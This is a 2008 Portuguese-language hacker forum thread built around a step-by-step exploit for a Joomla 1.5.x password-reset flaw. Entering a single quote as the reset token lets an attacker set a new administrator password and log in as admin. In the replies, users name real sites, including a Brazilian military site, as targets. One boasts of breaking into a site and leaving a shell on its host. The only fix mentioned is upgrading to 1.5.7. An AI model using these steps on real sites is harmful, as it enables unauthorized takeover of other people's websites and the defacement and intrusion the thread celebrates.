Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability

DarkGenesis · 04 de October , 2008, 12:48:14 PM

Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability

Exemplo:

1. Ir na url: target.com/index.php?
option=com_user&view=reset&layout=confirm

2. Digite no campo "token" o caractere ' e clique em OK.

3. Digite a nova senha de admin .

4. Ir para a url: target.com/administrator/

5. Entre com o Login do admin com a nova senha. :D

ÐλяkFeλя · 04 de October , 2008, 12:55:06 PM

Muito legal DG, apresar de ja ter versões superiores do joomla 1.5.x, ainda ha muitos sites que não atualizaram, geralmente aqueles que pagam para alguem fazer o site....Abraços...

PS: Hahsuasua "traira"..rsrsr

Triplo X · 04 de October , 2008, 04:21:37 PM

Putz, e eu já ia colocar meu site com joomla 1.5 no ar. :-X

Mas os novos módulos de login não estão vulneráveis, já testei um. ^^

Ωmega · 16 de October , 2008, 10:47:09 AM

Auhauhauhau...

Existem muitos sites por ai que continuam utilizando a versão 1.5.5 do joomla, um exemplo é este: http://joomla.1.5.pietrogallo.it/index.php?option=com_user&view=reset&layout=confirm. 8)

KEst · 16 de October , 2008, 10:54:41 AM

Tem como fazer isso nesse site?
http://www.dfpc.eb.mil.br/

Tentei mas

QuoteVocê não tem permissão para acessar esta área do site.
Você precisa efetuar a entrada no site.

abobre · 16 de October , 2008, 11:08:14 AM

Quote from: KEst on 16 de October , 2008, 10:54:41 AM
Tem como fazer isso nesse site?
http://www.dfpc.eb.mil.br/

Tentei mas

QuoteVocê não tem permissão para acessar esta área do site.
Você precisa efetuar a entrada no site.

Esse site utiliza a versão 1.0.X, sendo assim esse bug não tem utilidade.

Procure sites que estão utilizando o joomla 1.5.X até .1.5.6.

Boa sorte

Triplo X · 16 de October , 2008, 01:18:16 PM

Quote from: Omega on 16 de October , 2008, 10:47:09 AM
Auhauhauhau...

Existem muitos sites por ai que continuam utilizando a versão 1.5.5 do joomla, um exemplo é este: http://joomla.1.5.pietrogallo.it/index.php?option=com_user&view=reset&layout=confirm. 8)

É, mas eles souberam proteger muito bem.

Code Select

FUCK OFF RETARD
Isso é o que diz quando tentamos modificar. ;P

E ninguém sabe se é mesmo a versão afetadda que está no site.
Podem muito bem ter deixado o endreço do site 1.5 mas pode ser outra versão.
Isso não tem nada a ver...

[]s.

Ωmega · 16 de October , 2008, 01:38:05 PM

QuoteE ninguém sabe se é mesmo a versão afetadda que está no site.
Podem muito bem ter deixado o endreço do site 1.5 mas pode ser outra versão.

Por acaso, você já notou algo diferente na página principal? ::)
http://joomla.1.5.pietrogallo.it/ Todo mundo está fazendo uma festa lá. :P

Tenho toda certeza que o Joomla que eles utilizam é a versão 1.5, sendo que já entrei e deixei minha shell no host deles. 8)

Até...

[Ω]

ÐλяkFeλя · 16 de October , 2008, 02:28:10 PM

LOL...Realmente quando se é ultimo na festa na ha mais nada a fazer mesmo, concerteza o primeiro a ter feito isso ja deve ter mudado tudo, a nao ser que seja muito burro... :D

do mesmo jeito que fizeram nesse site...

Bugslabs

Mais ainda ha muitos sites com joomla 1.5.x

Triplo X · 18 de October , 2008, 08:35:51 AM

Quote from: ÐarkGenesis on 04 de October , 2008, 12:48:14 PM
Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability
5. Entre com o Login do admin com a nova senha. :D

Putz, o meu tá vul. :-\
Como corrigir?

Quote from: Dark Fear on 04 de October , 2008, 12:55:06 PM
apresar de ja ter versões superiores do joomla 1.5.x, ainda ha muitos sites que não atualizaram, geralmente aqueles que pagam para alguem fazer o site....Abraços...

Não encontrei uma versão superior à do 1.5.x
Poderia nos passar a informação?

Obrigado.

KEst · 18 de October , 2008, 09:06:47 AM

Quote from: Triplo X on 18 de October , 2008, 08:35:51 AM
Putz, o meu tá vul. :-\
Como corrigir?

Não encontrei uma versão superior à do 1.5.x
Poderia nos passar a informação?

Quote from: abobre on 16 de October , 2008, 11:08:14 AM
.....
Esse site utiliza a versão 1.0.X, sendo assim esse bug não tem utilidade.
....

ps: ler os posts anteriores antes de postar é ótimo Triplo X.

Triplo X · 18 de October , 2008, 09:35:09 AM

Quote from: KEst on 18 de October , 2008, 09:06:47 AM
Quote from: Triplo X on 18 de October , 2008, 08:35:51 AM
Putz, o meu tá vul. :-\
Como corrigir?

Não encontrei uma versão superior à do 1.5.x
Poderia nos passar a informação?

Quote from: abobre on 16 de October , 2008, 11:08:14 AM
.....
Esse site utiliza a versão 1.0.X, sendo assim esse bug não tem utilidade.
....

ps: ler os posts anteriores antes de postar é ótimo Triplo X.

Cara, você bebeu?
O tópico é sobre a versão 1.5.x ou seja: superior a versão 1.0
Eu não fiz pergunta ou qualquer citação sobre a versão 1.0, então pra quê isso? ???

argth. Você é quem deveria ler primeiro.

DarkGenesis · 18 de October , 2008, 10:15:59 AM

Estão vulneravéis os CMS's que utilizam o Joomla versão 1.5.1 até 1.5.6.
O Joomla 1.5.7 não está vulneravel a está falha. 8)

Triplo X · 18 de October , 2008, 10:28:59 AM

Obrigado por explicar.
Mas vc também hein:

QuoteJoomla 1.5.x (Token) Remote Admin Change Password Vulnerability

então não são todas as versões 1.5 ::)

Mas pelo menos deixou isso bem claro agora.

[]s.

ÐλяkFeλя · 18 de October , 2008, 05:55:46 PM

Quote from: Triplo X on 18 de October , 2008, 08:35:51 AM

Putz, o meu tá vul. :-\
Como corrigir?

Me passa o endereço de seu site ae...rsrsrsrsrs cara é so atualizar para a versão 1.5.7

Quote from: Dark Fear on 04 de October , 2008, 12:55:06 PM
apresar de ja ter versões superiores do joomla 1.5.x, ainda ha muitos sites que não atualizaram, geralmente aqueles que pagam para alguem fazer o site....Abraços...

Quote from: Triplo X
Não encontrei uma versão superior à do 1.5.x
Poderia nos passar a informação?

Obrigado.

Toma WWW.JOOMLA.COM.BR :D